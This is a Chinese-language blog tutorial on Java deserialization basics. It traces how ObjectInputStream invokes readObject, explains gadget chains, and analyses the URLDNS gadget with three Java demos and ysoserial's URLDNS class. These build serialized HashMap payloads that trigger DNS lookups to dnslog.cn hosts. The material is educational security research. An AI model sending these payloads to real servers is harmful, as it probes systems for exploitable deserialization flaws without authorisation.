<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="博客">
    <meta name="description" content="最难不过坚持">
    <meta name="author" content="lazysugar">
    
    <title>
        
            Java反序列化基础 |
        
        lazysugar&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/favicon-32x32.ico">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"1azy.icu","root":"/","language":"zh-CN","path":"search.xml"}
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true,"layout":"right"},"style":{"primary_color":"#0066cc","logo":"/favicon-32x32.ico","favicon":"/favicon-32x32.ico","avatar":"/favicon-32x32.ico","first_screen":{"enable":true,"background_img":"/images/bg.svg","description":"最难不过坚持.","hitokoto":false},"scroll":{"progress_bar":false,"percent":false}},"local_search":{"enable":true,"preload":false},"code_block":{"tools":{"enable":false,"style":"default"},"highlight_theme":"default"},"pjax":{"enable":false},"lazyload":{"enable":false},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.21"},"waline":{"server_url":null,"reaction":false,"version":2},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false}},"post":{"author_label":{"enable":false,"auto":false,"custom_label_list":["Trainee","Engineer","Architect"]},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":false,"reward":{"enable":false,"img_link":null,"text":null}},"website_count":{"busuanzi_count":{"enable":false,"site_uv":false,"site_pv":false,"page_pv":false}},"version":"3.8.5"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>


<main class="page-container border-box">

    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/favicon-32x32.ico">
                </a>
            
            <a class="site-name border-box" href="/">
               lazysugar&#39;s Blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                分类
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">

                

                    <div class="fade-in-down-animation">
    <div class="post-page-container border-box">

        <div class="article-content-container border-box">

            

            <div class="article-content-bottom border-box">
                
                    <div class="article-title">
                        Java反序列化基础
                    </div>
                

                
                    <div class="article-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/favicon-32x32.ico">
                            </div>
                        
                        <div class="info-box">
                            <div class="author">
                                <span class="name">lazysugar</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="article-meta-info-container border-box post">
    <div class="article-meta-info border-box">
        


        
            <span class="meta-info-item article-create-date">
                <i class="icon fa-solid fa-calendar-check"></i>&nbsp;
                <span class="pc">2023-03-12 12:16:12</span>
                <span class="mobile">2023-03-12 12:16</span>
            </span>

            <span class="meta-info-item article-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="pc" data-updated="Sat Jun 03 2023 03:33:28 GMT+0800">2023-06-03 03:33:28</span>
            </span>
        

        
            <span class="meta-info-item article-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="article-category-ul">
                    
                            <li class="category-item"><a href="/categories/java%E5%AE%89%E5%85%A8/">java安全</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="article-tag meta-info-item border-box">
                <i class="icon fas fa-tags"></i>&nbsp;
                <ul class="article-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/java%E5%AE%89%E5%85%A8/">java安全</a></li>
                        
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">反序列化</a></li>
                        
                    
                </ul>
            </span>
        

        
        
            <span class="meta-info-item article-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>3k 字</span>
            </span>
        
        
            <span class="meta-info-item article-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>12 分钟</span>
            </span>
        
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="article-content keep-markdown-body">
                    

                    <h1 id="序列化与反序列化概念"><a href="#序列化与反序列化概念" class="headerlink" title="序列化与反序列化概念"></a>序列化与反序列化概念</h1><p>在 Java 中的序列化与反序列化，就是将一个 Java 对象当前状态以字符串（字节序列）的形式描述出来，这串字符可能被储存&#x2F;发送到任何需要的位置，在适当的时候，再将它转回原本的 Java 对象。</p>
<p>这中间需要一个规则，规则中描述了序列化和反序列化时究竟该如何把一个对象处理成字符串，又如何把字符串变回对象，因为这一过程必须是可逆的。</p>
<p>Java 提供了两个类 <code>java.io.ObjectOutputStream</code> 和 <code>java.io.ObjectInputStream</code> 来实现序列化和反序列化的功能，其中 ObjectInputStream 用于恢复那些已经被序列化的对象，ObjectOutputStream 将 Java 对象的原始数据类型和图形写入 OutputStream。</p>
<p>在 Java 的类中，必须要实现 <code>java.io.Serializable</code> 或 <code>java.io.Externalizable</code> 接口才可以使用，而实际上 Externalizable 也是实现了 Serializable 接口。</p>
<h2 id="ObjectOutputStream"><a href="#ObjectOutputStream" class="headerlink" title="ObjectOutputStream"></a>ObjectOutputStream</h2><p>ObjectOutputStream 继承的父类或实现的接口如下：</p>
<ul>
<li>父类 OutputStream：所有字节输出流的顶级父类，用来接收输出的字节并发送到某些接收器（sink）。</li>
<li>接口 ObjectOutput：ObjectOutput 扩展了 DataOutput 接口，DataOutput 接口提供了将数据从任何 Java 基本类型转换为字节序列并写入二进制流的功能，ObjectOutput 在 DataOutput 接口基础上提供了 <code>writeObject</code> 方法，也就是类（Object）的写入。</li>
<li>接口 ObjectStreamConstants：定义了一些在对象序列化时写入的常量。常见的一些的比如 <code>STREAM_MAGIC</code>、<code>STREAM_VERSION</code> 等。</li>
</ul>
<h2 id="ObjectInputStream"><a href="#ObjectInputStream" class="headerlink" title="ObjectInputStream"></a>ObjectInputStream</h2><p>ObjectInputStream 继承的父类或实现的接口如下：</p>
<ul>
<li>父类 InputStream：所有字节输入流的顶级父类。</li>
<li>接口 ObjectInput：ObjectInput 扩展了 DataInput 接口，DataInput 接口提供了从二进制流读取字节并将其重新转换为 Java 基础类型的功能，ObjectInput 额外提供了 <code>readObject</code> 方法用来读取类。</li>
<li>接口 ObjectStreamConstants：同上。</li>
</ul>
<p>ObjectInputStream 实现了反序列化功能，看一下其中的关键方法。</p>
<h3 id="readObject"><a href="#readObject" class="headerlink" title="readObject"></a>readObject</h3><p>从 ObjectInputStream 读取一个对象，将会读取对象的类、类的签名、类的非 transient 和非 static 字段的值，以及其所有父类类型。</p>
<p>我们可以使用 <code>writeObject</code> 和 <code>readObject</code> 方法为一个类重写默认的反序列化执行方，所以其中 <code>readObject</code> 方法会 “传递性” 的执行，也就是说，在反序列化过程中，会调用反序列化类的 <code>readObject</code> 方法，以完整的重新生成这个类的对象。</p>
<p>#反序列化漏洞</p>
<p>在前面提到过，一个类想要实现序列化和反序列化，必须要实现 <code>java.io.Serializable</code> 或 <code>java.io.Externalizable</code> 接口。</p>
<p>Serializable 接口是一个标记接口，标记了这个类可以被序列化和反序列化，而 Externalizable 接口在 Serializable 接口基础上，又提供了 <code>writeExternal</code> 和 <code>readExternal</code> 方法，用来序列化和反序列化一些外部元素。</p>
<p>其中，如果被序列化的类重写了 writeObject 和 readObject 方法，Java 将会委托使用这两个方法来进行序列化和反序列化的操作。</p>
<p>正是因为这个特性，导致反序列化漏洞的出现：在反序列化一个类时，如果其重写了 <code>readObject</code> 方法，程序将会调用它，如果这个方法中存在一些恶意的调用，则会对应用程序造成危害。</p>
<p>##为什么会执行readObject呢？</p>
<p>来到<code>java.io.ObjectInputStream#readObject(java.lang.Class&lt;?&gt;)</code></p>
<p><img src="/images/20230424205256.png"></p>
<p><code>readObject</code>方法会调用<code>readObject0</code>方法</p>
<p><img src="/images/20230424205507.png"></p>
<p><code>readObject0</code>方法以字节的方式去读，当读到<code>0x73</code>，代表这是一个对象的序列化数据，将会调用 <code>readOrdinaryObject</code> 方法进行处理</p>
<p><img src="/images/20230424205943.png"></p>
<p><code>readOrdinaryObject</code>中会判断类是否实现了 Externalizable 接口，如果是，执行<code>readExternalData</code> 方法，不过不是，执行 <code>readSerialData</code> 方法去调用类中的<code>readObject</code> 方法。</p>
<p><img src="/images/20230424210302.png"></p>
<p><code>readSerialData</code> 方法先通过<code>hasReadObjectMethod</code>判断对象是否重写<code>readObject</code> 方法，如果是， 执行<code>invokeReadObject</code> 方法调用对象中的 <code>readObject</code>。</p>
<p>序列化触发原理同理，但是一般实际环境不会去主动序列化不可信的来源。</p>
<p>##Gadget概念</p>
<p>一个能成功执行的反序列化调用链需要三个元素：</p>
<ul>
<li><strong>kick-off</strong> 入口点（重写了 readObject 的类）</li>
<li><strong>sink</strong> （最终执行恶意动作的点：RCE…）</li>
<li><strong>chain</strong> （中间的调用链）</li>
</ul>
<p>#从URLDNS理解反序列化</p>
<p>URLDNS只依赖原生类，没有 jdk 版本限制，也被 ysoserial 涵盖在其中,所以非常适合新手来理解反序列化。它不会执行命令，只会触发 DNS 解析，因此通常用来探测是否存在反序列化漏洞.</p>
<p>这个漏洞关键点是 Java 内置的 <code>java.net.URL</code> 类，这个类的 <code>equals</code> 和 <code>hashCode</code> 方法具有一个有趣的特性：在对 URL 对象进行比较时（使用 <code>equals</code> 方法或 <code>hashCode</code> 方法），会触发一次 DNS 解析，因为对于 URL 来说，如果两个主机名（host）都可以解析为相同的 IP 地址，则这两个主机会被认为是相同的（sink）。</p>
<p>##<code>equals</code>方法解析</p>
<p><code>URL#equals</code> 方法重写了 Object 的判断，调用 <code>URLStreamHandler#equals</code> 方法进行判断：<br><img src="/images/20230425112129.png"></p>
<p><code>URLStreamHandler#equals</code> 方法判断 URL 对象是否相同，并调用 <code>sameFile</code> 方法比较两个 URL，看它们是否引用了相同的 protocol(协议)、host(主机)、port(端口)、path(路径)。</p>
<p><img src="/images/20230425112552.png"></p>
<p><code>sameFile</code> 方法在比较 host(主机)时，调用 <code>hostsEqual</code> 方法进行比较。</p>
<p><img src="/images/20230425112607.png"></p>
<p><code>hostsEqual</code> 方法调用 <code>getHostAddress</code> 方法对要比较的两个 URL 进行请求解析 IP 地址，并实施对比。</p>
<p><img src="/images/20230425112641.png"></p>
<p><code>getHostAddress</code> 方法使用 <code>InetAddress.getByName()</code> 方法对 host 进行解析，触发了 DNS 请求。</p>
<p>##<code>hashCode</code>方法解析</p>
<p><code>hashcode</code>代表对象的地址说的是对象在<strong>hash表</strong>中的位置，当在散列存储结构中确定对象的存储地址时，就会调用对象的<code>hashcode</code>方法，比如<code>HashMap</code>。URL 的 <code>hashCode</code> 方法也进行了重写，调用了 <code>URLStreamHandler#hashCode</code> 方法。在此之前有一个判断，那就是 <code>hashCode != -1</code>。</p>
<p><img src="/images/20230425113832.png"></p>
<p>同样是调用了 <code>getHostAddress</code> 方法对 URL 的 host 进行了解析。</p>
<p><img src="/images/20230425113902.png"></p>
<p>无论是使用 <code>equals</code> 方法，还是使用 <code>hashCode</code> 方法，应用程序都会解析DNS，这就是漏洞的 <strong>sink</strong> 点。</p>
<p>接下来寻找<strong>kick-off</strong> 入口点，谁重写了<code>readObject</code>，并且<code>readObject</code>还会调用<code>equals</code>或<code>hashCode</code>方法， 那就是URLDNS gadget 的主角 —— <code>java.util.HashMap</code>。<br>HashMap的原理可以看<a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1167574">这篇文章</a>。</p>
<p>我们直接看到HashMap 的 <code>readObject</code> 方法，可以看到，在<code>putVal</code>的时候会调用<code>hash</code>方法计算key对象的hash值</p>
<p><img src="/images/20230425114513.png"></p>
<p><code>hash</code>方法中，如果key不为空，就会调用key的<code>hashCode</code>方法,如果我们在key中传入url对象就触发DNS解析。</p>
<p><img src="/images/20230425114637.png"></p>
<p>这个逻辑就是 URLDNS 这条反序列化利用的 gadget 的基本原理，接下来我们测试一下，有两个需要注意的点是：</p>
<ul>
<li>想要让HashMap的key中有值，就需要调用HashMap的<code>put</code>方法去放入key&#x2F;value，在使用 HashMap 的 <code>put</code> 方法时，也是调用 <code>putVal</code> 方法，会对 key 进行 hash，触发解析。如果我们不想在生成 payload 时触发 DNS 解析，就要使用反射将值放进去。</li>
<li>URL 对象有一个属性 hashCode，默认是 -1，使用<code>hashCode</code> 方法计算时会在 hashCode 属性中缓存已经计算过的值，如果再次计算将直接返回值，不会在触发 URLStreamHandler 的 <code>hashCode</code> 方法，也就不会触发漏洞。所以我们需要在生成的 HashMap 中的 URL 参数的 hashCode 值在反序列化时为 -1，而刚才说过，如果使用 put 方法，会调用一次 key 的 hash 计算，也就是 URL 的 <code>hashCode</code> 方法，这样就把 hashCode 缓存了，在反序列化时就不会触发 URLStreamHandler 的 <code>hashCode</code> 方法以及后面的逻辑。</li>
</ul>
<p>所以有两种思路解决这个问题：</p>
<ul>
<li>如果使用 HashMap 的 <code>put</code> 方法，将 URL 对象放入 Map 的 key 中之前，先将其 URL 对象 hashCode 进行修改，使其不等于 -1，这样就不会触发 DNS 查询，放入之后，再使用反射将 URL 对象中的 hashCode 修改为 -1，反序列化的时候就可以正常触发了。</li>
<li>直接反射调用 HashMap 的 <code>putVal</code> 方法绕过 hash 计算。（由于 JDK 1.7 中方法名不一样，细节也不一样，所以不具有通用性）</li>
</ul>
<p>第一种思路</p>
<pre><code>    public class URLDNS1 &#123;

    public static void main(String[] args) throws Exception &#123;

        HashMap&lt;URL, Integer&gt; hashMap = new HashMap&lt;&gt;();
        URL url = new URL(&quot;http://lmz3mb.dnslog.cn&quot;);
        Field field = Class.forName(&quot;java.net.URL&quot;).getDeclaredField(&quot;hashCode&quot;);
        field.setAccessible(true);

        field.set(url, 0x01010101);
        hashMap.put(url, 0);
        field.set(url, -1);

        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(&quot;E:\\JavaSecurity\\jndi_injection\\src\\main\\resources\\urldns.bin&quot;));
        oos.writeObject(hashMap);
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(&quot;E:\\JavaSecurity\\jndi_injection\\src\\main\\resources\\urldns.bin&quot;));
        ois.readObject();
    &#125;
&#125;
</code></pre>
<p>第二种思路：</p>
<pre><code>public class URLDNS2 &#123;

    public static void main(String[] args) throws Exception &#123;

        HashMap&lt;URL, Integer&gt; hashMap = new HashMap&lt;&gt;();
        URL                   url     = new URL(&quot;http://su18.dnslog.cn&quot;);

        Method[] m = Class.forName(&quot;java.util.HashMap&quot;).getDeclaredMethods();
        for (Method method : m) &#123;
            if (method.getName().equals(&quot;putVal&quot;)) &#123;
                method.setAccessible(true);
                method.invoke(hashMap, -1, url, 0, false, true);
            &#125;
        &#125;

        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(&quot;urldns2.bin&quot;));
        oos.writeObject(hashMap);
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(&quot;urldns2.bin&quot;));
        ois.readObject();
    &#125;
&#125;
</code></pre>
<p>以上两种都可以触发DNS查询</p>
<p>##ysoserial实现</p>
<pre><code>public class URLDNS implements ObjectPayload&lt;Object&gt; &#123;

        public Object getObject(final String url) throws Exception &#123;

                //Avoid DNS resolution during payload creation
                //Since the field &lt;code&gt;java.net.URL.handler&lt;/code&gt; is transient, it will not be part of the serialized payload.
                URLStreamHandler handler = new SilentURLStreamHandler();

                HashMap ht = new HashMap(); // HashMap that will contain the URL
                URL u = new URL(null, url, handler); // URL to use as the Key
                ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

                Reflections.setFieldValue(u, &quot;hashCode&quot;, -1); // During the put above, the URL&#39;s hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.

                return ht;
        &#125;

        public static void main(final String[] args) throws Exception &#123;
                PayloadRunner.run(URLDNS.class, args);
        &#125;

        /**
        * &lt;p&gt;This instance of URLStreamHandler is used to avoid any DNS resolution while creating the URL instance.
        * DNS resolution is used for vulnerability detection. It is important not to probe the given URL prior
        * using the serialized object.&lt;/p&gt;
        *
        * &lt;b&gt;Potential false negative:&lt;/b&gt;
        * &lt;p&gt;If the DNS name is resolved first from the tester computer, the targeted server might get a cache hit on the
        * second resolution.&lt;/p&gt;
        */
        static class SilentURLStreamHandler extends URLStreamHandler &#123;

                protected URLConnection openConnection(URL u) throws IOException &#123;
                        return null;
                &#125;

                protected synchronized InetAddress getHostAddress(URL u) &#123;
                        return null;
                &#125;
        &#125;
&#125;
</code></pre>
<p> ysoserial的方法是：自定义了SilentURLStreamHandler扩展了 URLStreamHandler ，让<code>getHostAddress</code>和<code>openConnection</code>方法返回空，在初始化 URL 对象时传入，当调用HashMap的<code>put</code>方法触发hash值计算时，url对象对调用我们自定义的<code>getHostAddress</code>返回空，这样就不会触发 DNS 查询，然后在<code>put</code> 之后则是通过反射将 URL 对象的 hashCode 的值重新改为 -1。</p>
<p>需要注意的是，为什么目标在反序列化时不会调用我们自定义的<code>getHostAddress</code>方法呢？</p>
<p>在URL类中的<code>handler</code>属性前有个关键字<code>transient</code>,可以自定义在序列化时，把哪些属性不写入字节序列中。所以在反序列化时，目标还是会执行dns请求。</p>
<pre><code>transient URLStreamHandler handler;
</code></pre>
<p>通过ysoserial的方法编写我们的测试demo：</p>
<pre><code>public class URLDNS3 &#123;

    static class SilentURLStreamHandler extends URLStreamHandler implements Serializable&#123;

        protected URLConnection openConnection(URL u) throws IOException &#123;
            return null;
        &#125;

        protected synchronized InetAddress getHostAddress(URL u) &#123;
            return null;
        &#125;
    &#125;

    public static void main(String[] args) throws Exception &#123;

        URLStreamHandler      handler = new SilentURLStreamHandler();
        HashMap&lt;URL, Integer&gt; hashMap = new HashMap&lt;&gt;();
        URL                   url     = new URL(null, &quot;http://m7ful0.dnslog.cn&quot;, handler);
        hashMap.put(url, 0);

        Field f = Class.forName(&quot;java.net.URL&quot;).getDeclaredField(&quot;hashCode&quot;);
        f.setAccessible(true);
        f.set(url, -1);


        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(&quot;E:\\JavaSecurity\\jndi_injection\\src\\main\\resources\\urldns3.bin&quot;));
        oos.writeObject(hashMap);
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(&quot;E:\\JavaSecurity\\jndi_injection\\src\\main\\resources\\urldns3.bin&quot;));
        ois.readObject();
    &#125;
&#125;
</code></pre>
<p>以上就是 URLDNS 分析的全部内容了，最后总结一下。</p>
<ol>
<li>利用说明：</li>
</ol>
<ul>
<li>通过 HashMap 的反序列化调用 URL 的 hashCode 方法发起 DNS 查询，通常用来检测反序列化漏洞的存在。</li>
</ul>
<ol start="2">
<li>Gadget 总结：</li>
</ol>
<ul>
<li>kick-off gadget：java.util.HashMap#readObject()</li>
<li>sink gadget：java.net.URL#hashCode()</li>
<li>chain gadget：无</li>
</ul>
<ol start="3">
<li>优点：</li>
</ol>
<ul>
<li>使用java内部的类进行构造，不依赖第三方库</li>
<li>如果目标可以出网，在目标没有回显的时候，可以用来验证是否存在反序列化漏洞</li>
</ul>

                </div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/java%E5%AE%89%E5%85%A8/">java安全</a>
                                    </li>
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">反序列化</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="article-nav">
                        
                            <div class="article-prev">
                                <a class="prev"
                                   rel="prev"
                                   href="/2023/03/15/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E2%80%94CC%E9%93%BE/"
                                   title="Java反序列化——CC链"
                                >
                                    <span class="left arrow-icon flex-center">
                                      <i class="fas fa-chevron-left"></i>
                                    </span>
                                            <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">Java反序列化——CC链</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%A6%82%E5%BF%B5"><span class="nav-text">序列化与反序列化概念</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#ObjectOutputStream"><span class="nav-text">ObjectOutputStream</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ObjectInputStream"><span class="nav-text">ObjectInputStream</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#readObject"><span class="nav-text">readObject</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box default">
        
            <div class="copyright-info info-item default">
                &copy;&nbsp;<span>2020</span>&nbsp;-&nbsp;2023
                
                    &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">lazysugar</a>
                
            </div>

            <div class="theme-info info-item default">
                由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
            </div>

            

            
                <div class="deploy-info info-item default">
                    
                        本站由 <span class="tooltip" data-tooltip-content="GitHub Pages"><img src="/images/deploy-provider/github.png"></span> 提供部署服务
                        
                </div>
            
        

        <div class="count-item info-item default">
            
                <span class="count-box border-box word">
                    <span class="item-type border-box">总字数</span>
                    <span class="item-value border-box word">68.4k</span>
                </span>
            

            

            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%A6%82%E5%BF%B5"><span class="nav-text">序列化与反序列化概念</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#ObjectOutputStream"><span class="nav-text">ObjectOutputStream</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ObjectInputStream"><span class="nav-text">ObjectInputStream</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#readObject"><span class="nav-text">readObject</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>



<!-- common -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/dark-light-toggle.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local-search -->

    
<script src="/js/local-search.js"></script>



<!-- code-block -->


<!-- lazyload -->


<div class="">
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        
            
<script src="/js/post/toc.js"></script>

        

        <!-- copyright-info -->
        

        <!-- share -->
        
    

    <!-- category-page -->
    

    <!-- links-page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
